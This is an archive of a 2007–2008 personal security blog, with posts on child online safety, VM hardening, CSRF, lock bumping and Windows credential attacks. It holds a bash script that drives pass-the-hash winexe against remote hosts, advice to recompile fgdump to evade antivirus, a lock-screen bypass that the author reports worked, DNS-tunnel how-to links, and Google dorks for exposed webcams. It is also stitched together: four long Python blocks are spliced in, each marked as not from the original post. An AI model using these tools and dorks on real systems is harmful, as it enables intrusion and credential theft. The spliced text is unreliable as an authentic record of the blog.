# Wednesday, November 19, 2008

I want to create a new presentation called Security for Soccer Moms. I was talking to someone at work who went to a PTA event, and there was a “CISSP” there who knew a lot about security and children (uhh…). So I wanted to jot this idea down, so someone can steal it or I can just get some free hits from the keywords people looking for porn search on.

There are a LOT of resources on this topic, and I will choose to look at the free ones. Sure, there are the net-nanny products that stop you from looking at porn on the internet, but they are all easy to get around once your kid gets smart, and let's face it, who likes to pay for something that takes up memory on your (likely Vista) home computer and makes it run even worse.

So I present my list; I will add to it over time. I make this list in dedication to all the crazy people who already have kids in high school… yikes.

The #1 rule I have: until you trust your kid, never allow a computer (that has internet) in a private area. I wouldn't recommend it anyway; keep your kids in view until they are older and you trust them, or kick them out.

  • PREVENT SOCIAL ENGINEERING
    • This is the most effective tool to keep your children safe from scary assholes.
      • Talk to your children about NOT using real facts of life; avoid putting up who your dad really works for.
        • Don't take a picture of your house address or link to it on Google Maps.
        • Don't publish your birth year; use a fake year.
        • Don't publish your own work history, or keep it vague, or mess up the addresses for locations (I work at Boeing in Spokane).
        • Don't publish your last name, or put an initial only (harder to stop kids doing this).
        • If you have rules about phones, publish only cell numbers that can't be traced by normals, and watch your kids' bills for strange 212 numbers.
        • Don't publish details on your school where possible.
        • Set up an email for your kids to use “on social networks” only (and monitor it).
        • Don't give dates when you will leave for vacation; talk about it when you get home! (Or I will just come steal your crap.)
      • I think you get the idea: just mess things up a little. A small change on your end causes a bad guy to keep moving to someone easier. In the end it all comes down to your parenting skills; a parent that says “I don't want to look at my kid's site to see what they are up to”, haha, then why are you reading this?? There is no privacy for a 7 year old on the internet, I don't care about your hippy views. Talk to your children about why you monitor the activity, and when they get older put a level of trust in them and don't monitor. If they screw up, then kick some ass.
      • Want to scare yourself? Google your children's names and see what data is out there on your home, family, child…
      • Also remember to LOOK at your kids' social pages; look at history etc. to see if they use MySpace etc. (this also applies to you and LinkedIn).
  • Prevent malware
    • This is just a crappy fact of life now; it's very hard to stop this without technical controls.
      • Use a “safe browser” in a virtual machine. It works great, and there are plenty of bootable browsers (just download Ubuntu): have the kid boot up an Ubuntu live CD and use the internet from that. Then whatever they mess up, you just reboot to fix. But they still can use Flash etc. etc. etc.
      • Use a hosts file redirector. Most kids wouldn't figure this out until they get real smart, and if they are that smart they are beyond you trying to control them with just software. Blocks ads, malware or porn.
      • Use free services like OpenDNS, which are a bit easier to deploy.
        • Set your firewall to use that DNS, then don't allow port 53 out of your network (53 = DNS), and then people CAN'T use the internet without some more serious hacking.
      • Most all open-source firewalls include some ability to do the same things for blocking sites; some will even replicate what Netgear etc. will do and put a “block list” of words into your layer 7 traffic. So if you go to a site that contains the word “boobs” it will disallow the request. (See your hardware for how to do that, as this is about free things.) Just learn to leverage what you likely already have.
      • These methods can all be used to block social network sites if wanted.
    • Tip: remember to remove the hosts file from the recent open files list, and use Notepad to edit it, so that you don't leave tracks of what you did.
  • Time restrictions on internet use
    • Kids hate homework; they like MySpace.
      • Most all open-source firewalls will allow a time browsing option; the pfSense firewall will allow you to require a login like at Starbucks and only allow you on for an amount of time in a time block. Or you could charge your kids.
      • A lot of consumer routers (things you buy at Best Buy) also have this feature; use what you've got!
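The "hosts file redirector" item above comes down to a hosts file in which every blocked name resolves to a sink address, so the request never leaves the machine. The script below is an added example (not from the original post) of how to maintain that list safely: it validates each hostname (one malformed line can break name resolution), deduplicates, and writes the entries into a marked section so re-running it never piles up duplicates. The blocklist and hosts file contents are constructed samples.

```python
"""Merge a domain blocklist into a hosts file as a marked, idempotent section.

Added example, not from the original post. Every listed domain resolves to
0.0.0.0, so the browser never reaches it. Sample inputs below are constructed.
"""
import re

BEGIN = "# BEGIN family-blocklist"
END = "# END family-blocklist"
SINK = "0.0.0.0"

# One DNS label: 1-63 chars of [a-z0-9-], not starting or ending with '-'.
_LABEL = re.compile(r"^(?!-)[a-z0-9-]{1,63}(?<!-)$")


def valid_hostname(name: str) -> bool:
    """Reject junk before it lands in the hosts file."""
    name = name.strip().lower().rstrip(".")
    if not name or len(name) > 253 or "." not in name:
        return False
    return all(_LABEL.match(label) for label in name.split("."))


def parse_blocklist(text: str) -> list[str]:
    """Accept plain domains, '0.0.0.0 domain' entries and comments; dedupe in order."""
    seen, out = set(), []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments
        if not line:
            continue
        name = line.split()[-1].lower().rstrip(".")  # last field is the hostname
        if valid_hostname(name) and name not in seen:
            seen.add(name)
            out.append(name)
    return out


def merge_hosts(existing: str, domains: list[str]) -> str:
    """Replace (or append) the marked section; existing entries outside it are untouched."""
    lines = existing.splitlines()
    if BEGIN in lines and END in lines and lines.index(BEGIN) < lines.index(END):
        head = lines[: lines.index(BEGIN)]
        tail = lines[lines.index(END) + 1:]
    else:
        head, tail = lines, []
    section = [BEGIN] + [f"{SINK} {d}" for d in domains] + [END]
    return "\n".join(head + section + tail) + "\n"


# Constructed sample inputs.
SAMPLE_BLOCKLIST = """
# ad and tracker hosts (constructed sample)
ads.example.net
0.0.0.0 tracker.example.org
Tracker.Example.ORG     # duplicate, different case
not a hostname!
"""
SAMPLE_HOSTS = "127.0.0.1 localhost\n::1 localhost\n"

if __name__ == "__main__":
    # On a real machine read/write C:\Windows\System32\drivers\etc\hosts or /etc/hosts instead.
    print(merge_hosts(SAMPLE_HOSTS, parse_blocklist(SAMPLE_BLOCKLIST)), end="")
```

Because the section is delimited by the two marker comments, the script can be re-run whenever the blocklist changes, and the rest of the hosts file (the `localhost` lines, anything the kid or another program added) is never touched.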

So remember: the security of your children is also your security. The tips here are also tips for you. The more you talk about it and let them use the tools and sites they want, the less they will fight you and hide things. An open-source relationship is one where everyone learns.

And no I have no children, this is all assumptions.

This document is a work in progress right now; give feedback if you think of other major issues that you have with kids, or know of with kids using the internet. I will make a new section and blather on about it.

posted on Wednesday, November 19, 2008 2:59:59 PM (Pacific Standard Time, UTC-08:00)
# Thursday, November 13, 2008

I just found a new tool on the OWASP site, WebSlayer. This tool is Win32-only right now, which bites, but the tool is AWESOME!

The payload generator is awesome, as are the complex rules you can quickly define to test a site. 31337

posted on Thursday, November 13, 2008 10:00:17 AM (Pacific Standard Time, UTC-08:00)
# Saturday, October 11, 2008

Sigh… is this the new bump key? I haven't seen a hack get run into the ground by the media since the bump key… Seriously, are we just bored in the security news world?

PGP_001

posted on Saturday, October 11, 2008 6:20:31 PM (Pacific Daylight Time, UTC-07:00)
# Monday, August 18, 2008

I have an upcoming presentation in Bellevue. This is my ever-evolving hacking and low-hanging-fruit presentation; there is a fair amount of new content. It's a 30 min talk to brush over the top 10 things. I wish I was DefCon cool, but until then…

Look, I even have a bio. Register here and use nca2008KK for a code.

posted on Monday, August 18, 2008 9:27:31 AM (Pacific Daylight Time, UTC-07:00)
# Wednesday, May 21, 2008
So let's pose a problem: you have a computer with an encrypted HDD and you can't reboot the PC. Or a computer has something worth getting out of memory (an encryption key) and you want it. But the computer is locked. Well, you can now hack this.

winlockpwn - a tool to connect to Windows over FireWire and inject a DLL hack into memory to bypass passwords on the "Windows lock screen", allowing you access to Windows with no password when locked.

If you're not a Linux power user, or just want to cheat, here is a setup guide, and if you use BackTrack here is a post about it.

So a lot of people say it works; I agree that it will - it uses DLL hacking for passwords. You can do this with the computer powered off or just hack it.

So what did I get? Nothing...

I get this error:

IOError: [Errno 22] Invalid argument

from firewire.py, line 693: "If a node doesn't feel like fulfilling a request, it will raise an IOError."

Now if you unplug the FireWire and plug it back in, repeatedly running the script, it will start scanning memory only to end with a device busy.

Seems that the "money time" is when the device is detected as a "Hard Drive"; you start scanning the memory at that point. Then the iPod comes in and all work ends.

Same issue on two computers.

But who's to say, I'm just odd.

UPDATE: May 22

I got it to work; who knows if I was sleepy or a reboot fixed it. But when I powered up, I started from "step 5" and followed the steps exactly.

Dell 630, fully patched, on the domain, and it worked! I had full access as advertised.

Something I noticed was that this morning businfo has 1 on node 0 and not 0 for all the data it spits out on what will and won't work.

posted on Wednesday, May 21, 2008 9:43:17 PM (Pacific Daylight Time, UTC-07:00)
# Monday, April 28, 2008
Updates crunched into one post, as it's been a slow month for security and nerdy things...

Security:
New versions of fgdump, for your slurp tool, are out
http://www.foofus.net/fizzgig/fgdump

Along with another neat tool for pass-the-hash type information gathering
http://sourceforge.net/projects/incognito

A guy rolled his own version of the usb2ram tool that will dump WDE drive keys
http://www.mcgrewsecurity.com/?p=93

Also, anyone seen that US Air Force commercial about blowing up satellites? Great security awareness video, haha.

Wedding:
Almost everything is done; we got the wine most recently, just need to set it in motion!

Work:
I'm officially off IT support again; now I just do security consulting!

In other news, I also passed my test for General HAM; you can now call me K7MHI.

posted on Monday, April 28, 2008 2:44:37 PM (Pacific Daylight Time, UTC-07:00)
# Thursday, February 21, 2008

I was just in the conference trying to swipe the memory from a laptop someone left there. Problem is that I had to remove the keyboard, then I broke my little screwdriver, and when I did all this I realized I forgot my can of air. Then it was too late; my memory had gone muy loco.

This isn't a "holy crap my shit is 31337 h4xor pwnd" but a "wow that's a cool hack", sort of like an Xbox running Linux or an oscilloscope that can print vector graphics from Pong. This would be a cool spy trick or uber 31337 bad guy move. But if you wanted to get around it, you just use encrypted file mounts. I would imagine that the protection on the temporary mounts is protected, or you just time out and unmount the encrypted mount.


An elementary way to do this is the old keylogger. Works every time. I bet you aren't checking your docking station keyboard every morning? (Thank you, centas, for the use of the building custodial jumpsuit for access to your office.)


I think the big thing here is don't let bad guys finger your RAM!


Did you see all the things that will cause problems....

http://citp.princeton.edu/memory/faq/


I do want a copy of the RAM2USB boot application they have, as that would be handy for uses other than just hacking "secret keys".


Or be totally insane and check this out.

posted on Thursday, February 21, 2008 10:24:10 PM (Pacific Standard Time, UTC-08:00)
# Wednesday, December 05, 2007

Here is a cool tool (OWASP WebGoat) that will test you on your hacker skills; from 31337 to nub3 you can see where you rank. I got to the last 4 modules and didn't have the skillz to continue (mostly the time to keep going).

I strongly recommend that if you're interested in security / web security you check out this project and run around the site to get learned. BTW, a lot of my browser plug-ins will help you pass the quizzes.

Other things to hack: wargames, the De-ICE distro.

posted on Wednesday, December 05, 2007 2:49:23 AM (Pacific Standard Time, UTC-08:00)
# Thursday, November 29, 2007

I wanted to make a list of browser plug-ins that I use and find quite important to security and daily ops work.

First, for IE (I accidentally upgraded to 7.0 and didn't feel like un-installing the behemoth)

  • Bayden Systems' TamperIE offers HTTPS form tampering
    • Sort of a mac-daddy tamper application to change your POST data on the fly; must have.
  • Microsoft's IE Developer Toolbar
    • Change values on the fly; also get header info and more right away.
  • Microsoft's IE Powertoys for WebDevs
    • Was cool, but it appears the highlight and show-source features don't work with IE7; however, it still works for DOM data, so I keep it.

Now the giant list for Firefox (where all the 31337 users are)

  • AdBlockPlus
    • This is like going from dial-up to DSL; the internet all of a sudden becomes “sweet”.
  • BlogJet
    • This is also in my IE; it's my blogger application.
  • DOM Inspector
    • Handy for webdev and de-construction.
  • DownloadThemAll
    • I don't like to click, and this is a priceless tool for saving clicks.
  • GoogleBrowserSync
    • I don't like how big Google is and I don't like the idea of Google watching what I browse; this was just an interesting tool since I am on lots of computers. I just don't have the guts to sign in yet.
  • GoogleToolBar
    • This is a must, duh.
  • HttpHeaders
    • Handy for webdev and de-construction.
  • ModifyHeaders
    • Handy for webdev and de-construction, and user-agent mods.
  • NoScript
    • The only “security” Leo Laporte knows without Steve giving him a script. Handy for hacking things.
  • RefControl
    • Spoof the referrer sent to the server.
  • PDF Download
    • Sometimes I like to download PDFs, sometimes I like to view them live; this lets me choose.
  • Tamper Data
    • Same as TamperIE but for 'zilla.
  • UrlParams
    • A different type of TamperData-style plugin.
  • User Agent Switcher
  • WebDev
    • This tool is a must for anyone; you can quickly shut parts of sites on and off and mod them.

Update June 2008:
Some good hack tools
http://www.securitycompass.com/exploitme.shtml
posted on Thursday, November 29, 2007 6:25:23 PM (Pacific Standard Time, UTC-08:00)
# Wednesday, October 17, 2007

So I have a WaMu credit card. I have nothing good to say about WaMu; when I activated the card I actually yelled at them that I didn't want to buy any insurance or fraud detection service. It was worse than a Girl Scout that needs to make a quota. So then I went to close out the card (I used it for a 0% loan). I didn't want to call, so I set up an account online. I had to make my password. But check out the HORRIBLE password requirements. Not only do they limit you to 8 alpha characters, but they also give you example passwords! haha

Wamu1

Wamu2

posted on Wednesday, October 17, 2007 10:07:07 AM (Pacific Daylight Time, UTC-07:00)
# Thursday, October 11, 2007

So this topic of virtual servers is starting to catch on a bit more. I still think it will go the way of Bluetooth and only people that drink the Intel Kool-Aid will adopt it, but that's just me; don't get me wrong, I feel there is a place for virtual machines in the data center, the technology and its use just isn't impressing me today. The real point of this post is to bring together some of the tips about virtual server security. I say virtual server and not VMware because they aren't the only players in the market; an example is Virtuozzo, which I was just talking with a friend about. I was listening to a PaulDotCom podcast the other day (which, if you're interested, you need to go listen to).

Anywhoo, I have compiled a list of some of the top things to disable or change to harden your virtual environment. The following documents go into further detail, but I wanted to explain a few ideas. The first is disabling unused hardware; examples are the FDD, CD-ROM, USB, and most importantly the NIC. Obviously you can understand the media: not only will it free up resources (other tips are to shut down screensavers and the K-Desktop), but they just aren't typically needed in a virtual environment. The NIC is one that most people overlook (depending on setup and how you have things configured this can be an incorrect tip): they will have a virtual host with the ability to link to your LAN. Now this is particularly an issue if the threat of a virus jumping out of a virtual machine ever comes to light. If you have a host on a protected network and your VMs are on a DMZ, for example, then once the virtual machine is hacked your protected network is at risk. The number of times that you should have to touch the host is minimal, so keep the KVM attached and disable the protocols and IP address on the host.

The next topic, which ties in with the first, is to keep similar-security devices on the same host, and put that host in the proper subnet for the security of the virtuals. Meaning: don't put your web server on the same host as your financial server, and don't put your web server on the same host as a tool server that is located in your ring 0/1 LAN. If it's a DMZ server and you would have put it there physically, then put it there phys-virtually (that's physically and virtually in one word). So say this with me once again: put like-security servers in the proper realm with the proper virtuals sharing a host.

Now to get a little specific to vendors; the example is VMware. With VMware you have cool things like drag-and-drop file copy, cut and paste, etc. In a server virtual machine you want to shut these enhancements off.
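The copy/paste and drag-and-drop enhancements are controlled per VM by `isolation.tools.*` keys in the .vmx file. The checker below is an added example, not from the original post or from VMware: it parses a .vmx and reports which of those keys are missing or left enabled. The key names are the ones VMware's hardening guidance uses for these features; the two sample .vmx files are constructed.

```python
"""Audit a VMware .vmx for the guest-isolation settings that disable copy/paste
and drag-and-drop between the console and the guest.

Added example, not from the original post. Key names follow VMware's hardening
guidance; the sample .vmx texts below are constructed.
"""

# Setting -> value a hardened server VM should carry.
REQUIRED = {
    "isolation.tools.copy.disable": "TRUE",
    "isolation.tools.paste.disable": "TRUE",
    "isolation.tools.dnd.disable": "TRUE",
    "isolation.tools.setGUIOptions.enable": "FALSE",
}


def parse_vmx(text: str) -> dict[str, str]:
    """.vmx lines look like   key = "value"   ; keys are treated case-insensitively."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        settings[key.lower()] = value.strip('"')
    return settings


def isolation_findings(text: str) -> list[str]:
    """One finding per required setting that is absent or carries the wrong value."""
    settings = parse_vmx(text)
    findings = []
    for key, wanted in REQUIRED.items():
        actual = settings.get(key.lower())
        if actual is None:
            findings.append(f'{key} not set (feature not explicitly disabled); add {key} = "{wanted}"')
        elif actual.upper() != wanted:
            findings.append(f'{key} = "{actual}"; expected "{wanted}"')
    return findings


# Constructed samples: the weak one is a typical default-ish VM, the hardened one has the keys set.
WEAK_VMX = '''\
.encoding = "UTF-8"
config.version = "8"
displayName = "web01"
memsize = "1024"
isolation.tools.copy.disable = "FALSE"
'''

HARDENED_VMX = WEAK_VMX.replace('isolation.tools.copy.disable = "FALSE"', '''\
isolation.tools.copy.disable = "TRUE"
isolation.tools.paste.disable = "TRUE"
isolation.tools.dnd.disable = "TRUE"
isolation.tools.setGUIOptions.enable = "FALSE"''')

if __name__ == "__main__":
    for name, text in (("web01 (weak)", WEAK_VMX), ("web01 (hardened)", HARDENED_VMX)):
        print(name, "->", isolation_findings(text) or ["ok"])
```

Run it over every .vmx on a host (they live beside the VM's disk files) and the list of findings is your to-do list; the same parse-and-compare approach extends to any other `.vmx` key the hardening paper tells you to pin.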

Patch! VMware and Microsoft each have patches for the software they produce; update and patch your software. VMware has no nice patch management notification like Microsoft Update, so patch your software, and also patch your hosts and virtuals for OS and app patches.

VMware has actually published a paper on security with ESX Server; this has important tips for logs, users, and resource provisioning to prevent denial of service issues.

Also, CIS is supposed to release hardening guides; however, they also publish good standards for the OS in the virtual, so check them out, along with the Microsoft-published 2000 hardening and 2003 hardening guides.

Another interesting summary from the guys at Petri, specifically because they have screenshots.

posted on Thursday, October 11, 2007 2:19:23 PM (Pacific Daylight Time, UTC-07:00)

A “new” security threat that I thought was rather interesting: cross-site request forgery. The idea is that if you have two browsers open, one is your bank and the other is a hack site, the hack site can use this idea to piggyback on your cookie and session to do things with your bank without you knowing. How? Well, it would just send HTTP POST data (or GET) in the back end of the browser. So what does this mean, why do you care? If this takes off it's nasty till people fix the sites you use. To not fall victim to this, just don't flip browsers while you're browsing; if you are on a site that you feel needs to be secure, close out MySpace.

Also, the tool that I use for Google hacking pay sites is the Mozilla RefControl, which is the underlying idea behind this hack.
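The site-side fix the post alludes to ("till people fix the sites you use") is to stop trusting the session cookie alone, since the browser attaches it to a POST from any origin. The code below is an added example, not from the original post: a toy transfer handler that authorises on the cookie only, beside one that also demands a session-bound token the foreign page cannot read and rejects a mismatched `Origin` header. The request/session objects are simplified stand-ins for a web framework, and the scenario is constructed.

```python
"""CSRF: cookie-only authorisation beside a token-checked handler.

Added example, not from the original post. Request and session objects are
simplified stand-ins for a web framework; the bank/attacker scenario is constructed.
"""
import hmac
import secrets
from dataclasses import dataclass, field


@dataclass
class Request:
    method: str
    form: dict
    cookies: dict
    headers: dict = field(default_factory=dict)


SESSIONS: dict[str, dict] = {}     # session id -> {"user": ..., "csrf": ...}
BALANCES = {"alice": 100}
SITE_ORIGIN = "https://bank.example"


def login(user: str) -> str:
    """Create a session and a per-session CSRF token; return the cookie value."""
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = {"user": user, "csrf": secrets.token_urlsafe(32)}
    return sid


def csrf_token_for(sid: str) -> str:
    """The bank embeds this in its own forms; same-origin policy keeps other sites from reading it."""
    return SESSIONS[sid]["csrf"]


def transfer_vulnerable(req: Request) -> str:
    """Authorises on the cookie only: the browser sends it with ANY site's POST."""
    sess = SESSIONS.get(req.cookies.get("sid", ""))
    if sess is None:
        return "401 not logged in"
    BALANCES[sess["user"]] -= int(req.form["amount"])
    return "200 transferred"


def transfer_hardened(req: Request) -> str:
    """Also requires the session-bound token (constant-time compare) and, when the
    browser supplies an Origin header, that it matches the bank's own origin."""
    sess = SESSIONS.get(req.cookies.get("sid", ""))
    if sess is None:
        return "401 not logged in"
    origin = req.headers.get("Origin")
    if origin is not None and origin != SITE_ORIGIN:
        return "403 cross-origin request"
    if not hmac.compare_digest(req.form.get("csrf", ""), sess["csrf"]):
        return "403 missing or bad csrf token"
    BALANCES[sess["user"]] -= int(req.form["amount"])
    return "200 transferred"


def demo() -> tuple[str, str, str, str]:
    """Constructed scenario: forged POSTs from another tab, then a genuine one."""
    BALANCES["alice"] = 100
    sid = login("alice")
    forged = Request("POST", {"amount": "50"}, {"sid": sid}, {"Origin": "https://evil.example"})
    forged_no_origin = Request("POST", {"amount": "50"}, {"sid": sid})
    r1 = transfer_vulnerable(forged)           # succeeds: cookie alone is enough
    r2 = transfer_hardened(forged)             # refused on Origin
    r3 = transfer_hardened(forged_no_origin)   # refused: no token
    genuine = Request("POST", {"amount": "10", "csrf": csrf_token_for(sid)},
                      {"sid": sid}, {"Origin": SITE_ORIGIN})
    r4 = transfer_hardened(genuine)            # accepted
    return r1, r2, r3, r4


if __name__ == "__main__":
    print(demo(), BALANCES)
```

Note that the hardened handler loses only the forged requests: the genuine form, which carries the token the bank itself rendered, still goes through, so the fix costs users nothing and does not depend on them closing MySpace first.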

posted on Thursday, October 11, 2007 3:35:09 AM (Pacific Daylight Time, UTC-07:00)
# Tuesday, October 09, 2007
I haven't had time to post about this, but there is a new version of fgdump. This will dump the protected storage if possible, the local LM table, and a cachedump of any system you have admin rights to. This tool is the de facto tool for collecting data for pen-test stuff. The special thing about this tool is that it will sneak past most AV tools, so you don't need to kill them to audit. I also recommend downloading the source and compiling it on your own to protect even further against AV messing this up.

posted on Tuesday, October 09, 2007 5:26:53 PM (Pacific Daylight Time, UTC-07:00)
# Wednesday, September 12, 2007

Found a workaround: just go to File, Open, Other User's Folder. Solves the problem for now. There is some bug with the “quick open” list that normally shows up in a toolbar on the left of Outlook.

"The Messaging interface has returned an unknown error." occurs when trying to view a shared calendar

In Outlook 2007, an error may occur when trying to view a shared calendar from the People's Calendars list. The error will say "The Messaging interface has returned an unknown error.  If the problem persists, restart Outlook."  Restarting Outlook does resolve the problem.

Microsoft has confirmed that this is a known bug with Outlook 2007.  We are currently waiting to hear back from Microsoft as to the decision on whether this will be resolved by a Hot Fix or included in Office 2007 Service Pack 1.

posted on Wednesday, September 12, 2007 9:46:31 PM (Pacific Daylight Time, UTC-07:00)
# Thursday, August 30, 2007
The Pass-The-Hash tools from DefCon etc. are being put out on the net. Specifically, two tools that I have talked about (my posts about Pass The Hash and sidejacking) but didn't have code for. Pass-The-Hash for Windows has a toolkit out, and the sidejacking trick is also released. Have phun.

posted on Thursday, August 30, 2007 7:23:40 PM (Pacific Daylight Time, UTC-07:00)
# Wednesday, August 08, 2007

I wanted to post a quick blurb about corporate cell phones and security. There are a lot of choices out there today: iPhone, BlackJack, Windows PDAs, Treo, Nokia and finally BlackBerrys. In regards to all the cell phones except the BlackBerry, the security sucks. I do know that Treos have some remote erase, but if you're seriously considering setting your company up with anything for cell enterprise, look no further than BlackBerry. The amount of security that you can implement, from encryption to PGP to passwords to Bluetooth and camera and mass storage use, is insane. Yes, this is a plug for BlackBerry, and no, I'm not paid for it.

The hacks that people are not using today are cell hacks; hacks on the iPhone etc. are just too juicy to not take advantage of. Be aware of the threats that your CEOs and management are purchasing on the company.

Best practice documents and a full overview of IT policy are located at the following BlackBerry KB site.

posted on Wednesday, August 08, 2007 4:36:09 PM (Pacific Daylight Time, UTC-07:00)
# Monday, August 06, 2007

Another DefCon toy that is fun is what a security firm is calling sidejacking. Basically you're just recording a TCP stream and replaying it later; specifically, what it's looking for is the transmission of a cookie to the server with your password and data in it. Think pass-the-hash. The program is called Hamster and is a remake of Ferret; it should be available now from Errata Security, but it's not. It will eventually be out there, so just keep clicking.

posted on Monday, August 06, 2007 2:43:35 PM (Pacific Daylight Time, UTC-07:00)

Well, at DefCon the Medeco M3 was finally hacked to crap, with an easy script-kiddy how-to. I need to update my bump key presentation. Medeco clip trick

From the looks of this a bump key could be used, but it appears the pins would not cooperate 100%, which is why they use a blank cut of the key; but the copy cut is hard to obtain, which makes the probability of the threat from co-workers gone bad a little less likely. Also, since the blanks for the keyway are still "not easy to get", you will need to wait for an online retailer to sell Medeco bump keys before this is truly script kiddy. I do wonder how hard it would be to file a 9-cut key from an existing one and make that work right? I am about to bust out my Medeco lock; this evening I will be attempting to make a bump key blank. See, the problem is that I still have no way to get a blank that fits the lock 1:1, so this threat, however clever, today is not an “easy hack”. So if you have no defense in depth and you have a good bounty of treasure, watch out. If you have proper security this isn't really a kick in the pants today.

posted on Monday, August 06, 2007 11:21:49 AM (Pacific Daylight Time, UTC-07:00)
# Thursday, July 26, 2007

So some people started to really bust loose with out-of-the-box thinking on this one. You know how you will hit some networks where you can only get DNS? Like wifi spots, guest networks, NAC subnets? Here is a little trick to get access to resources by using UDP 53; add that to your pentest. The first link has the source, a step-by-step hosting service and a video on how to work it; the other two are just follow-up info.

skript kiddy help for DNS tunnel

description with code sample for the dns tunnel

full how to dns tunnel
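From the network owner's side, the flip side of "you can only get DNS" is that tunnelled traffic has to look like DNS, and it looks like very odd DNS: long, high-entropy first labels, TXT/NULL record types carrying encoded data, and hundreds of never-repeated subdomains of one zone from a single client. The script below is an added example, not from the original post or any of the linked tools: it scores a resolver query log with those three heuristics. The log format (`<time> <client> <qtype> <qname>`) and the sample lines are constructed; the tunnel-shaped labels are generated from hashes purely to get realistic-looking encoded data.

```python
"""Flag DNS-tunnel-shaped queries in a resolver log.

Added example, not from the original post. Log format '<time> <client> <qtype> <qname>'
and all sample lines are constructed; the zone split (last two labels) is a
simplification that ignores multi-part public suffixes such as co.uk.
"""
import base64
import hashlib
import math
from collections import defaultdict


def label_entropy(label: str) -> float:
    """Shannon entropy in bits/char: English-ish labels sit near 3, base32/64 payloads above 4."""
    if not label:
        return 0.0
    counts = defaultdict(int)
    for ch in label:
        counts[ch] += 1
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def parse_line(line: str) -> tuple[str, str, str, str]:
    ts, client, qtype, qname = line.split()
    return ts, client, qtype.upper(), qname.lower().rstrip(".")


def suspicious_query(qtype: str, qname: str) -> list[str]:
    """Per-query signals; returns the reasons a single query looks like a tunnel carrier."""
    reasons = []
    labels = qname.split(".")
    if len(labels) >= 3:                       # host.zone.tld or deeper
        first = labels[0]
        if len(first) > 40:
            reasons.append("long label")
        if label_entropy(first) > 3.8:
            reasons.append("high entropy")
        if qtype in ("TXT", "NULL", "CNAME") and len(first) > 20:
            reasons.append(f"{qtype} with encoded label")
    if len(qname) > 100:
        reasons.append("long qname")
    return reasons


def analyse(lines, unique_threshold: int = 20) -> dict[tuple[str, str], dict]:
    """Aggregate per (client, zone); alert on any per-query hit or on too many unique names."""
    stats = defaultdict(lambda: {"unique": set(), "flagged": 0, "reasons": set()})
    for line in lines:
        _, client, qtype, qname = parse_line(line)
        zone = ".".join(qname.split(".")[-2:])
        entry = stats[(client, zone)]
        entry["unique"].add(qname)
        reasons = suspicious_query(qtype, qname)
        if reasons:
            entry["flagged"] += 1
            entry["reasons"].update(reasons)
    alerts = {}
    for key, e in stats.items():
        if len(e["unique"]) >= unique_threshold:
            e["reasons"].add("many unique subdomains")
        if e["reasons"]:
            alerts[key] = {"unique": len(e["unique"]), "flagged": e["flagged"],
                           "reasons": sorted(e["reasons"])}
    return alerts


def _constructed_tunnel_label(i: int) -> str:
    """Base32 of a hash: stands in for an encoded payload chunk (constructed, not real traffic)."""
    return base64.b32encode(hashlib.sha256(str(i).encode()).digest()).decode().lower().rstrip("=")


SAMPLE_LOG = [
    "10:00:01 10.0.0.5 A www.example.com",
    "10:00:02 10.0.0.5 AAAA www.example.com",
    "10:00:03 10.0.0.7 MX example.com",
] + [f"10:01:{i:02d} 10.0.0.9 TXT {_constructed_tunnel_label(i)}.tun.example.org"
     for i in range(25)]

if __name__ == "__main__":
    for (client, zone), a in analyse(SAMPLE_LOG).items():
        print(f"{client} -> {zone}: {a['unique']} unique names, {a['flagged']} flagged, {a['reasons']}")
```

Tune `unique_threshold` and the entropy cut-off against a day of your own logs before alerting on them; CDNs and some anti-spam products legitimately generate long encoded labels, so the value of the per-query reasons is in the combination with the per-zone volume, not in any one of them alone.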

posted on Thursday, July 26, 2007 10:54:50 AM (Pacific Daylight Time, UTC-07:00)
# Friday, July 13, 2007

I have made a script to demo the use of winexe with the pass-the-hash patch. This script is nothing more than a quick-entry bash script to demo in front of people, so they don't have to know the Linux command line to understand what is happening.

#!/bin/bash
# Name: hash_pass
# Version: .01
# Interactive front end for the pass-the-hash patched winexe: the patched binary
# reads the LM:NTLM hash from the SMBHASH variable, so the password after -U is a dummy.

echo ""
echo "Demo of the pass-the-hash exploit with SMB and an NT/LM hash"
echo ""
echo -n "paste hash in format LM_HASH:NTLM_HASH : "
read -r hsh
export SMBHASH="$hsh"
echo -n "username and domain in format DOMAIN/user (note / not \\): "
read -r usid
echo -n "hostname or IP of the resource to use: "
read -r hst
echo -n "command to run on host ex. cmd.exe: "
read -r comnd
./winexe -U "$usid%foo" "//$hst" "$comnd"

posted on Friday, July 13, 2007 12:36:58 PM (Pacific Daylight Time, UTC-07:00)
# Tuesday, June 12, 2007

This is something way cool that isn't available to hacker kiddies yet. Using a tool like cachedump you can then use the hash you get to ‘run as’ the hash's user. Then I can run as the user on the computer or network. This means that you don't need a hash table, and it doesn't matter if it's a 127-character password or an NT hash. Link to security blog

Must find this code. – Msvctl

Update: I did my research on this, and you can find tools that will show this by using the term “passing the hash”. I will detail more once I have more of a way to fix it in a Windows environment. I will also blog more once I have a good set of tools to show it off.

Update: there is a copy of winexe that can be patched to pass the hash, and it works. I will not detail it until a later date, but I can confirm it works the same as the blog link here.

posted on Tuesday, June 12, 2007 12:45:27 PM (Pacific Daylight Time, UTC-07:00)
# Monday, May 14, 2007

This is all over the web, but it's sort of fun. Google the following types of topics; specifically, use Google Suggest http://www.google.com/webhp?complete=1&hl=en and put in URLs you know of (for example, take an appliance you have, put in /admin/blah.html, and see if Google will suggest it).

I stole the following list from another blog. But it will give you the idea of how Suggest can be used to find things that people might have put online by accident.

inurl:/view.shtml
intitle:"Live View / - AXIS" | inurl:view/view.shtml^
inurl:ViewerFrame?Mode=
inurl:ViewerFrame?Mode=Refresh
inurl:axis-cgi/jpg
inurl:axis-cgi/mjpg (motion-JPEG)
inurl:view/indexFrame.shtml
inurl:view/index.shtml
inurl:view/view.shtml
liveapplet
intitle:"live view" intitle:axis
intitle:liveapplet
allintitle:"Network Camera NetworkCamera"
intitle:axis intitle:"video server"
intitle:liveapplet inurl:LvAppl
intitle:"EvoCam" inurl:"webcam.html"
intitle:"Live NetSnap Cam-Server feed"
intitle:"Live View / - AXIS"
intitle:"Live View / - AXIS 206M"
intitle:"Live View / - AXIS 206W"
intitle:"Live View / - AXIS 210"
inurl:indexFrame.shtml Axis
inurl:"MultiCameraFrame?Mode=Motion"
intitle:start inurl:cgistart
